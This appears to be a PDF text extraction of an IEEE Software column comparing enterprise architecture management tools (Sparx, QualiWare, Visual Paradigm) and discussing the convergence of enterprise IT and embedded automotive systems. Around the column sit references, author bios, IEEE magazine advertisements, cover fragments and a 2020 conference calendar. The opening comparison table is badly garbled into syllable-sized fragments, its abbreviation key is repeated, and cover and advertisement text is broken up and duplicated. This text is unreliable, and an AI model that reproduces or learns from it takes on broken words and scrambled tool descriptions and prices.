pabi

lity

plan

ning

, sce

nario

mod

elin

g,

and

impa

ct a

naly

sis

•M

anag

es a

pplic

atio

n po

rtfo

lios

to a

chie

ve b

usin

ess

goal

s•

Visu

aliz

es th

e co

mpl

ex re

latio

nshi

ps b

etw

een

busi

ness

ca

pabi

litie

s an

d te

chno

logi

es•

Inte

ract

ive

anal

ysis

com

bine

d w

ith c

ompr

ehen

sive

mod

el-

ing

reve

als

depe

nden

cies

bet

wee

n ap

plic

atio

ns a

nd IT

•Co

llabo

ratio

n w

ith s

take

hold

ers

to c

reat

e te

chno

logy

pl

ans

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t

Spar

x en

terp

rise

arch

itect

•TO

GAF

, AD

M, A

rchi

Mat

e•

BPM

N•

UML

•N

ot a

spe

ci�c

-pur

pose

EAM

sui

te•

Prov

ides

dyn

amic

mod

el s

imul

atio

n th

at a

llow

s ar

chite

cts

to v

erify

the

corr

ectn

ess

of b

ehav

iora

l mod

els

and

gain

a b

ette

r und

erst

andi

ng o

f how

a b

usin

ess

syst

em

wor

ks•

Trac

eabi

lity

of E

A m

odel

ele

men

ts w

ith c

ode

•An

inte

grat

ed s

oftw

are-

deve

lopm

ent e

nviro

nmen

t with

a

built

-in

EA m

odel

ing

tool

•So

urce

cod

e ro

und-

trip

•M

any

tem

plat

es fo

r gen

erat

ing

code

from

mod

els,

and

re

vers

e en

gine

erin

g fr

om s

ever

al p

rogr

amm

ing

lang

uage

s•

Nav

igat

ion

betw

een

mod

els

and

code

Four

ver

sion

s:US

$229

–69

9/lic

ense

(s

tand

ard)

US$2

99–8

99/li

cens

e (�

oatin

g)

Qua

liWar

e X

•EA

3 , Z

achm

an, T

OG

AF, O

IO E

A,

FEAF

-II,

DN

DAF

, Arc

hiM

ate,

ED

ML,

UM

L, B

PMN

, DM

N

•Pr

ovid

es a

n ov

ervi

ew o

f how

the

orga

niza

tion

exec

utes

its

stra

tegy

and

mak

es

com

plex

pro

cess

es c

lear

for t

he e

mpl

oyee

s w

ho p

erfo

rm th

em•

Supp

orts

risk

man

agem

ent a

nd h

andl

ing

unce

rtai

ntie

s re

late

d to

exe

cutin

g th

e bu

sine

ss s

trat

egy

•M

anag

es a

pplic

atio

n lif

ecyc

les

and

crea

tes

over

view

s of

w

here

and

for w

hat a

pplic

atio

ns a

re u

sed

•Es

timat

es th

e to

tal c

ost o

f ow

ners

hip,

retu

rn o

n in

vest

-m

ent,

and

busi

ness

val

ue o

f IT

•Id

entif

y re

dund

ant I

T an

d m

ake

wel

l-in

form

ed s

trat

egic

de

cisi

ons

on te

chno

logy

inve

stm

ents

Pric

ing

has

to b

e re

ques

ted

from

com

mer

cial

de

part

men

t

Visu

al

Para

digm

en

terp

rise

editi

on

•TO

GAF

, Arc

hiM

ate

•PM

BOK

•UM

L, E

R, D

FD

•N

ot a

n EA

M to

ol it

self,

it is

a g

ener

al-p

urpo

se m

odel

ing

tool

s th

at s

uppo

rt E

A m

odel

ing

but i

t sup

port

s TO

GAF

AD

M m

etho

dolo

gy a

nd is

Arc

hiM

ate

com

plia

nt•

High

usa

bilit

y of

the

grap

hica

l mod

eler

•Su

ppor

ts p

roje

ct-m

anag

emen

t life

cycl

e gu

ide-

thro

ugh

with

agi

le d

evel

opm

ent f

eatu

res

•In

tegr

ates

the

EA re

posi

tory

with

oth

er a

pplic

atio

n el

e-m

ents

in U

ML

diag

ram

s

Subs

crip

tion:

US$

89/

mon

thPe

rpet

ual:

US$2

,000

API:

appl

icat

ion

prog

ram

min

g in

terfa

ce; P

EAF:

pra

gmat

ic e

nter

pris

e ar

chite

ctur

e fra

mew

ork;

BIA

N: B

anki

ng In

dust

ry A

rchi

tect

ure

Netw

ork;

COB

IT: C

ontro

l Obj

ectiv

es fo

r Inf

orm

atio

n an

d Re

late

d Te

chno

logi

es; I

TIL:

Info

rmat

ion

Tech

nolo

gy In

frast

ruct

ure

Libr

ary;

IDEF

: int

egra

tion

de�n

ition

; RE

ST: R

epre

sent

atio

nal S

tate

Tra

nsfe

r; RD

BMS:

rela

tiona

l dat

abas

e m

anag

emen

t sys

tem

; SQL

: stru

ctur

ed q

uery

lang

uage

; OSS

: ope

n so

urce

sys

tem

s; S

aaS:

sof

twar

e as

a s

ervi

ce; S

oaM

L: s

ervi

ce o

rient

ed a

rchi

tect

ure

Mod

elin

g La

ngua

ge; S

ysM

L: s

yste

ms

Mod

elin

g La

ngua

ge; N

AF: N

ATO

Arch

itect

ure

Fram

ewor

k (In

a r

ecur

sive

way

, NAT

O, N

orth

Atla

ntic

Tre

aty

Orga

niza

tion)

; MoD

AF: M

inis

try o

f Def

ence

Arc

hite

ctur

e Fr

amew

ork;

FEA

F: fe

dera

l-ent

erpr

ise-

arch

itect

ure-

fram

ewor

k; IT

4IT:

info

rmat

ion

tech

nolo

gy fo

r in

form

atio

n te

chno

logy

; EA:

ent

erpr

ise

arch

itect

ure;

OI O

EA:

En

terp

rise

Arch

itect

ure

Met

hod

for T

he D

anis

h M

inis

try o

f Sci

ence

, Tec

hnol

ogy

and

Inno

vatio

n; D

NDAF

: Dep

artm

ent o

f Nat

iona

l Def

ence

/Can

adia

n Ar

med

For

ces

Arch

itect

ure

Fram

ewor

k; E

DML:

Eve

ryw

here

Dis

play

s M

arku

p La

ngua

ge; D

MN:

Dec

isio

n M

odel

and

Not

atio

n; P

MBO

K: P

roje

ct

Man

agem

ent B

ody

of K

now

ledg

e; E

R: e

ntity

-rel

atio

nshi

p; D

FD: d

ata

�ow

dia

gram

; CM

DB: c

on�g

urat

ion

man

agem

ent d

atab

ase.

Tool

Fram

ewor

ks a

nd s

tand

ards

Usef

ulne

ss fo

r ent

erpr

ise

arch

itect

sUs

eful

ness

for I

T/so

ftw

are

prac

titio

ners

Pric

ing

TABL

E 1.

EA

M s

uite

s (c

ont.)

.

API:

appl

icat

ion

prog

ram

min

g in

terf

ace;

PEA

F: p

ragm

atic

ent

erpr

ise

arch

itect

ure

fram

ewor

k; B

IAN

: Ban

king

Indu

stry

Arc

hite

ctur

e N

etw

ork;

CO

BIT:

Con

trol

Obj

ectiv

es fo

r Inf

orm

atio

n an

d Re

late

d Te

chno

logi

es; I

TIL:

Info

rmat

ion

Tech

nolo

gy In

fras

truc

ture

Li

brar

y; ID

EF: i

nteg

ratio

n de

finiti

on; R

EST:

Repr

esen

tatio

nal S

tate

Tra

nsfe

r; RD

BMS:

rela

tiona

l dat

abas

e m

anag

emen

t sys

tem

; SQ

L: s

truc

ture

d qu

ery

lang

uage

; OSS

: ope

n so

urce

sys

tem

s; S

aaS:

soft

war

e as

a s

ervi

ce; S

oaM

L: s

ervi

ce o

rient

ed a

rchi

tect

ure

Mod

elin

g La

ngua

ge; S

ysM

L: s

yste

ms

Mod

elin

g La

ngua

ge; N

AF: N

ATO

Arc

hite

ctur

e Fr

amew

ork

(In a

recu

rsiv

e w

ay, N

ATO

, Nor

th A

tlant

ic T

reat

y O

rgan

izat

ion)

; MoD

AF: M

inis

try

of D

efen

ce A

rchi

tect

ure

Fram

ewor

k; F

EAF:

fede

ral-e

nter

pris

e-ar

chite

ctur

e-fr

amew

ork;

IT

4IT:

info

rmat

ion

tech

nolo

gy fo

r inf

orm

atio

n te

chno

logy

; EA:

ent

erpr

ise

arch

itect

ure;

OIO

EA:

Ent

erpr

ise

Arch

itect

ure

Met

hod

for T

he D

anis

h M

inis

try

of S

cien

ce, T

echn

olog

y an

d In

nova

tion;

DN

DAF

: Dep

artm

ent o

f Nat

iona

l Def

ence

/Can

adia

n Ar

med

For

ces

Arch

itect

ure

Fram

ewor

k; E

DM

L: E

very

whe

re D

ispl

ays

Mar

kup

Lang

uage

; DM

N: D

ecis

ion

Mod

el a

nd N

otat

ion;

PM

BOK:

Pro

ject

Man

agem

ent B

ody

of K

now

ledg

e; E

R: e

ntit

y-re

latio

nshi

p; D

FD: d

ata

flow

dia

gram

; CM

DB:

con

figur

atio

n m

anag

emen

t dat

abas

e.


SOFTWARE TECHNOLOGY

› EAM can be used for consolidating certain applications and technology in organizations. As a result, technology-management costs can be reduced or at least controlled.

› An appropriate EAM implementation can improve technology-management planning, as well as the effectiveness of IT investments, since these concerns are aligned with the company’s strategy.

› EA is an additional tool to manage an application portfolio. Thus, EAM contributes by improv-ing quality and reducing the risk of software delivery. In a broader point of view, IT asset portfolios can be also managed through a single repository in an EAM tool. Aside from applica-tions, this portfolio also includes infrastructure, IT resources, and services.

› EA improves engagement, analysis, and com-munication skills. Practitioners can realize and understand the business concerns supported (and aligned with) the applications they devel-oped or IT infrastructures they managed on a daily basis.

› Since EAM is a mechanism for making relevant decisions at the strategical level, IT/software practitioners should be able to model certain EA views from the IT/software assets they manage in an inductive way (e.g., with reverse engineer-ing techniques) while these models are aligned with the overall business strategy.

THE CONVERGENCE OF EA AND EMBEDDED IT

The traditional division between IT and embedded sys-tems is disappearing. Increasingly, embedded systems and devices have over-the-air connectivity for soft-ware upgrades, feature activation, and cloud services such as predictive maintenance. However, IT solutions connect to devices and create the Internet of Things (IoT). Embedded electronics, such as micro devices with sensors and actuators connected through the IoT, facilitate ubiquity. Data analytics, cloud storage and services, convergent interactivity and cognition, augmented reality with visualization and simulation, pattern recognition, machine learning, and artificial intelligence facilitate a convergence of IT and embed-ded systems.1 Underlying these, we identify enabling

methods, techniques, and tools, such as agile scaling and blockchain, to ensure security and trust in distrib-uted transactions, as well as microservices and open application programming interfaces that support soft-ware architectures.

EA adoption has been increasing; it can be used for planning, aligning, controlling, and organizing system complexity, which is a growing problem for IT and SW project managers. The increased complexity is due to the convergence of various trends.

› There is a broad spectrum of IT infrastructure that supports IS (e.g., cloud, IoT, edge comput-ing, and so forth).

› The internal structure of SW systems has increased with more layers and new compo-nents types or architectural paradigms, such as SOA and microservices.

› Customers are demanding more, in less time and with fewer problems, which has led to work in different ways (e.g., Lean, Agile, and DevOps).

These new software architectures and IT devices cannot be developed in isolation, without paying attention to business goals and enterprise drivers, which makes EAM critical. Actually, the new version 3 of ArchiMate has been extended with a physical sublayer,4 with which it is now possible to model and manage all kinds of cyberphysical system elements, such as embedded software or IoT sensors, in an integrated way. For example, it can be used for full traceability between all of the components of a car, hardware, software, and other purely physical non-IT applications.

The convergence of enterprise IT and embedded systems can best be observed in the fast-changing automotive market. A modern car has 50–120 embed-ded microcontrollers and is connected by various external interfaces to a variety of cloud and info-tainment technologies. Onboard software is in the hundred-millions of lines of code range and growing exponentially. Automotive software product lines and variants are among the largest and most complex in all industries. It is said that the automobile is rap-idly becoming a “computer on wheels.” Automotive original equipment manufacturers are implement-ing cars with next-generation production processes


SOFTWARE TECHNOLOGY

and vehicles with connected embedded sensors and actuators to obtain better intelligence and control. They adopt information and communication technol-ogy workflows from their IT systems to each single car. From a user experience perspective, the evolution is even more drastic. People have been buying cars for decades, but they now want mobility services. The car per se has ceased to attract users. This is best seen at the latest OOP IT conference (#OOPmuc), where global market leader Volkswagen boasted that they are hiring the people who want to get rid of cars.

REFERENCES1. C. Ebert and C. H. C. Duarte, “Digital transformation,”

IEEE Softw., vol. 35, no. 4, pp. 16–21, 2018.2. M. Lankhorst, Enterprise Architecture at Work:

Modelling, Communication and Analysis. Berlin: Springer-Verlag, 2017.

3. The Open Group, “TOGAF, enterprise ed., version 9.1,” U.K., 2011. [Online]. Available: http://www.togaf.org

4. The Open Group, “The ArchiMate 3.0 enterprise architecture modeling language,” U.K., 2016. [Online]. Available: http://www.opengroup.org/subjectareas /enterprise/archimate-overview

5. H. Shah and M. E. Kourdi, “Frameworks for enterprise architecture,” IT Prof., vol. 9, no. 5, pp. 36–41, 2007.

6. C. Ebert and A. Dubey, “Convergence of enterprise IT and embedded systems,” IEEE Softw., vol. 36, no. 3, pp. 92–97, May 2019.

RICARDO PEREZ-CASTILLO is a researcher at the Information Technologies and Systems Institute, University of Castilla-La Mancha (UCLM), Spain. His research interests include

architecture-driven modernization, model-driven develop-ment, business-process archaeology, and enterprise archi-tecture. Perez-Castillo received a Ph.D. in computer science from UCLM. Contact him at [email protected].

FRANCISCO RUIZ is a full professor at the Information Technologies and Systems Insti-tute, University of Castilla-La Mancha (UCLM), Spain. His research interests include

enterprise architecture, business-process technology, and software engineering. Ruiz received a Ph.D. in computer sci-ence from UCLM. Contact him at [email protected].

MARIO PIATTINI is the director of the Alarcos Research Group and a full professor at the University of Castilla-La Mancha, Spain. His research interests include software and data

quality, information-systems audit and security, and IT gover-nance. Piattini received a Ph.D. in computer science from Madrid Technical University, Spain. Contact him at mario [email protected].

CHRISTOF EBERT is the managing director of Vector Consulting Services and is a professor at the University of Stuttgart, Germany, and the Sorbonne, Paris. He is on the editorial

board of IEEE Software. He is a Senior Member of the IEEE. Contact him at [email protected].

IEEE Software seeks

practical, readable articles

that will appeal to experts

and nonexperts alike. The

magazine aims to deliver

reliable information to software

developers and managers to

help them stay on top of rapid

technology change. Submissions

must be original and no more

than 4,700 words, including 250

words for each table and � gure.

Call for Articles

Author guidelines: www.computer.org/software/author

Further details: [email protected]

www.computer.org/software

REGISTRATION IS OPEN! qce.quantum.ieee.org

The Future Directions Quantum Initiative invites you to IEEE Quantum Week 2020—the inaugural IEEE International Conference on Quantum Computing

and Engineering (QCE).

IEEEQUANTUMWEEK

NEW EVENT

12–16

OCTOBER 2020

Council on Superconductivity

CALL FOR SPECIAL ISSUE PROPOSALS

Computer solicits special issue proposals from lead experts. Proposed themes/issues should address timely, emerging topics that will be of broad interest to Computer’s readership. Special issues are an important component of Computer, as they deliver essential research insights and well-developed perspectives on new and established technologies and computing strategies.

We encourage submissions of high-quality proposals for the 2021 editorial calendar. Of particular interest are proposals centered on:

• offsite educational and business continuitytechnology challenges,

• privacy related to personal location trackingand surveillance (digital and physical),

• artificial intelligence and machine learning,

• technology’s role in disrupted supply chains,

• misinformation and disinformation (fakeinformation—malicious or non-malicious), and

• cyberwarfare/cyberterrorism

Proposal guidelines are available at: www.computer.org/csdl/magazine/co/write-for-us/15911

Deadline for proposal submission: 15 September 2020

04.20

vol. 53 no. 4 www.computer.org/computer

Com

puter

APRIL 2020

CO

MPLEX

ITY VER

SUS TR

UST

Volume 53 Num

ber 4

DATA ANALYSIS ANDCYBERPHYSICAL

SYSTEMS

03.20


Com

puter

MA

RCH

2020D

ATA A

NA

LYSIS AN

D C

YB

ERPH

YSICA

L SYSTEMS

Volume 53 Num

ber 3

Com

puter

AP

RIL 20

16B

IG D

ATA

Volume 49 Num

ber 4

www.computer.org/computer

FASTER PATENTING, P. 10 SKIN IN THE UI GAME, P. 83

04.16

Outlook

01.20


Com

puter

JAN

UA

RY 2020O

UTLO

OK

Volume 53 Num

ber 1

Com

puter

OC

TOB

ER 20

16

ENER

GY-EFFIC

IENT C

OM

PU

TING

Volum

e 49 Number 10


10.16

DIGITAL HEALTH: E-COACHING

AND REMOTE MONITORING

02.20

vol. 53 no. 2

Com

puter

FEBRU

ARY

2020D

IGITA

L HEA

LTH: E-C

OA

CH

ING

AN

D R

EMO

TE MO

NITO

RIN

GVolum

e 53 Number 2 www.computer.org/computer

EMERGENCYRESPONSE

Com

puter

MA

Y 2

016

EM

ER

GE

NC

Y R

ES

PO

NS

EVolum

e 49 Num

ber 5


IOT STANDARDS, P. 87 CYBERSECURITY’S FORMAL METHODISTS, P. 102

05.16

Technology Predictions

12.19


Com

puter

DEC

EMB

ER 2019TEC

HN

OLO

GY PR

EDIC

TION

SVolum

e 52 Number 12

Com

puter

JUN

E2

016

SE

CU

RIT

YTH

RE

ATS

Volume 49 N

umber 6


TO ROBOT, WITH LOVE, P. 88FUN WITH SENTIENT TOOLS, P. 95

06.16

50 YEARS OF NETWORKING

10.19


A Half-Century of the Arpanet 14

Com

puter

OC

TOB

ER 201950 Y

EAR

S OF N

ETWO

RK

ING

Volume 52 Num

ber 10

Software and Cybersecurity ■ Big Data: Privacy Versus Accessibility ■ Resiliency in Cloud Computing

November/December 2018Vol. 16, No. 6

CYBERSECURITY AND PRIVACY ISSUES IN BRAZIL

IEEE SECU

RITY &

PRIVAC

Y A

I ETHIC

S V

OLU

ME 16

NU

MBER 3

MAY/JU

NE 2018

WWW.CO

MPU

TER.ORG

/SECURIT

Y

E-Currency and Fairness ■ Ransomware Defense ■ A National Cybersecurity Policy

May/June 2018Vol. 16, No. 3

IEEE SECU

RITY &

PRIVAC

Y PRIVA

CY A

ND

AU

TOM

ATED A

IRPORT SC

REENIN

G

VO

LUM

E 17 N

UM

BER 2 M

ARC

H/A

PRIL 2019 WWW.CO

MPU

TER.ORG

/SECURIT

Y

March/April 2019Vol. 17, No. 2

IEEE SECU

RITY &

PRIVAC

Y D

IGITA

L FOREN

SICS, PA

RT 2 V

OLU

ME 17

NU

MBER 1

JAN

UA

RY/FEBRUA

RY 2019 WWW.CO

MPU

TER.ORG

/SECURIT

Y

Blockchain Technologies ■ The Fuzzing Revival ■ Cybersecurity for the Public Interest

January/February 2019Vol. 17, No. 1

Resiliency in Cloud Computing

November/December 2018Vol. 16, No. 6

Join the IEEE Computer Society for subscription discounts today!www.computer.org/product/magazines/security-and-privacy

IEEE Security & Privacy is a bimonthly magazine communicating advances in security, privacy, and dependability in a way that is useful to a broad section of the professional community.

The magazine provides articles with both a practical and research bent by the top thinkers in the fi eld of security and privacy, along with case studies, surveys, tutorials, columns, and in-depth interviews. Topics include:

• Internet, software, hardware, and systems security• Legal and ethical issues and privacy concerns• Privacy-enhancing technologies• Data analytics for security and privacy• Usable security• Integrated security design methods• Security of critical infrastructures• Pedagogical and curricular issues in security education• Security issues in wireless and mobile networks• Real-world cryptography• Emerging technologies, operational resilience,

and edge computing• Cybercrime and forensics, and much more

www.computer.org/security

w w w . c o m p u t e r . o r g / i n t e r n e t

IEEE IN

TERNET CO

MPU

TING

July/August 2018

Evolution of Rack-Scale System

s

Volum

e 22 Num

ber 4

VOLUME 22, NUMBER 4 JULY/AUGUST 2018

Evolution of Rack-Scale Systems


VOLUME 22, NUMBER 2 MARCH/APRIL 2018

Healthcare Informatics and Privacy


IEEE IN

TERNET CO

MPU

TING

M

ay/June 2018

Connected and Autonomous Vehicles

Volum

e 22 Num

ber 3

VOLUME 22, NUMBER 3 MAY/JUNE 2018

Connected and Autonomous Vehicles


IEEE IN

TERNET CO

MPU

TING

January/February 2018

IoT-Enhanced H

uman Experience

Volum

e 22 Num

ber 1

VOLUME 22, NUMBER 1 JANUARY/FEBRUARY 2018

IoT-Enhanced Human Experience

Join the IEEE Computer Society for subscription discounts today!www.computer.org/product/magazines/internet-computing

IEEE Internet Computing delivers novel content from academic and industry experts on the latest developments and key trends in Internet technologies and applications.

Written by and for both users and developers, the bimonthly magazine covers a wide range of topics, including:

• Applications• Architectures• Big data analytics• Cloud and edge computing• Information management• Middleware• Security and privacy• Standards• And much more

In addition to peer-reviewed articles, IEEE Internet Computing features industry reports, surveys, tutorials, columns, and news.

www.computer.org/internet

features industry reports, surveys, tutorials, columns, and news.




features industry reports, surveys, tutorials, columns, and news. reports, surveys, tutorials, columns, and news. reports, surveys, tutorials, columns, and news.


Conference Calendar

IEEE Computer Society conferences are valuable forums for learning on broad and dynamically shi� ing topics from within the computing profession. With over 200 conferences featuring leading experts and thought lead-

ers, we have an event that is right for you. Questions? Contact [email protected].

SEPTEMBER7 September

• EuroS&P (IEEE European Sym-posium on Security & Privacy), virtual

14 September• CLUSTER (IEEE Int’l Conf. on

Cluster Computing), virtual21 September

• ASE (IEEE/ACM Int’l Conf. on Automated Software Eng.), Melbourne, Australia

24 September• BigMM (IEEE Int’l Conf. on Mul-

timedia Big Data), virtual27 September

• ICSME (IEEE Int’l Conf. on So� -ware Maintenance and Evolu-tion), virtual

28 September• SecDev (IEEE Secure Develop-

ment), virtual

OCTOBER3 October

• PACT (Int’l Conf. on Parallel Architectures and Compila-tion Techniques), virtual

5 October• EDOC (IEEE Int’l Enterprise

Distributed Object Computing Conf.), virtual

12 October• ISSRE (IEEE Int’l Symposium

on Software Reliability Eng.), virtual

16 October• ICEBE (IEEE Int’ l Conf. on

e-Business Eng.), Guangzhou, China

17 October• MICRO (IEEE/ACM Int’l Sym-

posium on Microarchitecture), Athens, Greece

18 October• ICCD (IEEE Int’l Conf. on Com-

puter Design), virtual• MODELS (ACM/IEEE Int’l Conf.

on Model-Driven Eng. Lan-guages and Systems), Mon-treal, Canada

19 October• DFT (IEEE Int’l Symposium on

Defect and Fault Tolerance in VLSI and Nanotechnology Systems), Frascati, Italy

21 October• FIE (IEEE Frontiers in Educa-

tion Conf.), Uppsala, Sweden25 October

• VIS (IEEE Visualization Conf.), virtual

NOVEMBER6 November

• CCEM (IEEE Int’ l Conf. on Cloud Computing in Emerg-ing Markets), virtual

• SmartCloud (IEEE Int’l Conf. on Smart Cloud), Washington, DC, USA

9 November• ICTAI (IEEE Int’l Conf. on Tools

with Artificial Intelligence), virtual

• IR C ( IEEE In t ’ l C o n f. o n Robotic Computing), Taic-hung, Taiwan

• ISMVL (IEEE Int’l Symposium on Multiple-Valued Logic), Miyazaki, Japan

11 November• SEC (IEEE/ACM Symposium on

Edge Computing), San Jose, USA

15 November• SC, Atlanta, USA

16 November• FOCS (IEEE Symposium on

Foundations of Computer Sci-ence), Durham, USA

• LCN (IEEE Conf. on Local Com-puter Net works), S ydney, Australia

29 November • ICDCS (IEEE Int’l Conf. on Dis-

tributed Computing Systems), Singapore

30 November• ICHI (IEEE Int’l Conf. on Health-

care Informatics), Oldenburg, Germany

http://ichi2020.de

http://www.ieee-security.org/TC/EuroSP2020/

https://clustercomp.org/2020/

https://www.deakin.edu.au/ase2020

http://www.edoc2020.org/

http://bigmm2020.org/

https://icsme2020.github.io

https://secdev.ieee.org/2020/Home

https://pact20.cc.gatech.edu/

http://2020.issre.net/

https://conferences.computer.org/icebe/2020/index.htm

https://2020.ieeeccem.org/

http://ieeevis.org/year/2020/welcome

https://www.microarch.org/micro53/

http://iccd-conf.com/Home.html

http://www.modelsconference.org

http://www.dfts.org

http://fie-conference.org

http://www.cloud-conf.net/smartcloud/2020/

http://www.ictai2020.org/

https://icdcs2020.sg

http://irc.asia.edu.tw/2020/

http://www.mvl.jpn.org/ISMVL2020/

http://acm-ieee-sec.org/2020/

https://sc20.supercomputing.org

http://ieee-focs.org

https://www.ieeelcn.org

http://2020.issre.net/

DECEMBER2 December

• CSDE (IEEE Asia-Pacifi c Conf. on Computer Science and Data Eng.), Gold Coast, Australia

• ISM (IEEE Int’l Symposium on Multimedia), Naples, Italy

6 December • HOST (IEEE Int’l Symposium on

Hardware-Oriented Security and Trust), San Jose, USA

7 December • BDCAT (IEEE/ACM Int’l Conf.

on Big Data Computing, Appli-cations and Technologies), virtual

• UCC (IEEE/ACM Int’l Conf. on Utility and Cloud Computing), virtual

9 December • CC (IEEE Int’l Conf. on Conver-

sational Computing), Irvine, USA

• AIKE (IEEE Int’l Conf. on Arti-ficial Intelligence and Knowl-edge Eng.), Irvine, USA

10 December • BigData (IEEE Int’l Conf. on Big

Data), virtual14 December

• CloudCom (IEEE Int’l Conf. on Cloud Computing Technol-ogy and Science), Bangkok, Thailand

• HPCC (IEEE Int’l Conf. on High Performance Computing and Communications), Cuvu, Fĳ i

16 December • BIBM (IEEE Int ’ l Conf. on

Bioinformatics and Biomedi-cine), virtual

• HiPC (IEEE Int’l Conf. on High-Per f or manc e C ompu t ing , Data, and Analytics), virtual

29 December • BigDataSE (IEEE Int’l Conf. on

Big Data Science and Eng.), Guangzhou, China

• EUC (IEEE Int’l Conf. on Embed-ded and Ubiquitous Comput-ing), Guangzhou, China

• TrustCom (IEEE Int’l Conf. on Trust, Security and Privacy in Computing and Communica-tions), Guangzhou, China

2021

JANUARY5 January

• WACV (IEEE Winter Conf. on Applications of Computer Vision), Waikoloa, USA

17 January • BigComp (IEEE Int’l Conf. on

Big Data and Smart Comput-ing), Bangkok, Thailand

27 January • IC SC (IEEE Int ’ l Conf. on

Semantic Computing), Laguna Hills, USA

MARCH22 March

• PerCom (IEEE Int’l Conf. on Per-vasive Computing and Com-munications), Kassel, Germany

• MIPR (IEEE Int’l Conf. on Multi-media Information Processing and Retrieval), Tokyo, Japan

APRIL12 April

• ICST (IEEE Conf. on Software Testing, Verification and Val-idation), Porto de Galinhas, Brazil

MAY17 May

• IPDPS (IEEE Int’l Parallel and Distributed Processing Sym-posium), Portland, Oregon, USA

23 May • SP (IEEE Symposium on Secu-

rity and Privacy), San Fran-cisco, USA

Learn more about IEEE Computer Society conferencescomputer.org/conferences

ce8con(all).indd 73 7/13/20 12:05 PM

http://ieee-csde.org/

https://www.ieee-ism.org/

http://www.hostsymposium.org/

https://www.cs.le.ac.uk/events/BDCAT2020/index.htm

https://www.cs.le.ac.uk/events/UCC2020/

http://www.conversationalcomputing.org/

https://www.ieee-aike.org

http://bigdataieee.org/BigData2020/index.html

https://2020.cloudcom.org/

http://cse.stfx.ca/~hpcc/2020/

http://www.ieee-trustcom.org/BigDataSE2020/

https://hipc.org/

http://ieeebibm.org/BIBM2020/

http://ieee-trustcom.org/EUC2020/

https://www.ieee-icsc.org

http://wacv2021.thecvf.com/home

http://www.bigcomputing.org

http://www.percom.org/

https://mipr2021.org/

https://icst2021.icmc.usp.br/

http://www.ipdps.org/

http://www.ieee-security.org/TC/SP2021/

http://www.computer.org/conferences/

http://ieeebibm.org/BIBM2020/

http://ieee-trustcom.org/TrustCom2020/

Submit your paper today!Visit www.computer.org/oj to learn more.

Get Published in the New IEEE Open Journal of the Computer Society

Submit a paper today to the premier new open access journal in computing and information technology.

Your research will benefit from

the IEEE marketing launch and

5 million unique monthly users

of the IEEE Xplore® Digital Library.

Plus, this journal is fully open

and compliant with funder

mandates, including Plan S.

security and privacy automation blockchain digital...blockchain offers audit trails, i.e.,...

Documents